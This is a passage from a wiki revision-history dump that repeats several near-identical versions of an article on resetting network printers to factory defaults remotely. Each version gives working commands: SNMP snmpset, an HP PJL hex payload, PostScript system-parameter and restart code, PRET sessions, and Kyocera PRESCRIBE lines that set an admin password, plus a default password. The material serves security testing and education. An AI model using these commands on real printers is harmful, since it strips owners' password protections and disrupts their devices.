"AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- c9784614794b498359ea6f95565467017b16da8a 630 176 2017-06-25T11:26:03Z Admin 1 wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [DHCP https://de.wikipedia.org/wiki/Dynamic_Host_Configuration_Protocol] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: <syntaxhighlight lang=sh> snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 </syntaxhighlight> '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- d18abca288379f54186dfb5885d169f19790a983 176 167 2017-01-21T11:45:04Z Admin 1 wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: <syntaxhighlight lang=sh> snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 </syntaxhighlight> '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 9d73e3562ffd8777b7a399ef9918579cbdbb57c6 167 166 2017-01-20T16:05:12Z Admin 1 /* PRESCRIBE */ wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 791864a4188358cb5b0fa2dc7538bd2ef6b19ac4 166 142 2017-01-20T16:04:37Z Admin 1 wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PRESCRIBE commands documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- e6dfc81fdd0ca8c6db487adfba7d4f3d86d0737f 142 137 2017-01-15T15:39:56Z 92.227.58.56 0 /* PRESCRIBE */ wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the commands above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- dc2b44fd8377d63bb214a225145548fb5144f2e3 137 134 2017-01-14T20:02:41Z Admin 1 wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using netcat, for example) to port 9100/tcp of the printer and send the commands above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- a2b1981cc9d333c26de3f39f63b59558b91a6d80 134 124 2017-01-14T20:01:08Z Admin 1 /* PostScript */ wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 '''Who can perform this attack?''' Any anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using netcat, for example) to port 9100/tcp of the printer and send the commands above. '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- f3230080dae27d1d1b75f5f9a3257a88b3237c7f 124 115 2017-01-14T19:55:36Z Admin 1 /* PostScript */ wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer 